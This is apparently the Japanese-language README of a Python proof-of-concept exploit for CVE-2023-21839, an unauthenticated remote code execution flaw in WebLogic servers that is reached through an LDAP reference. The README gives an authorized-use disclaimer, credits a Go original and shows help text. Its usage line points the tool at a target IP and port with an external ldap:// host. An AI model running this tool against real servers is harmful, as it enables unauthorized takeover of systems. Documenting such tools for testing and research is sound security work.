
CVE-2023-21839 用の Python 概念実証エクスプロイト。LDAP インジェクションを介して WebLogic サーバーを標的とし、認証されていないリモートコード実行を実現します。
特別な要件に基づき、@4ra1n 氏のGO版をPythonに移植しました。この場を借りて感謝申し上げます!
本プログラムは、許可されたセキュリティテストおよび研究目的にのみ使用されるべきです。利用者はサイバーセキュリティ法に従い、適切に使用してください。
本ツールを使用して不正な攻撃などの違法行為が発生した場合、作者は一切の責任を負いません。
vulhub 再現:リンク
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
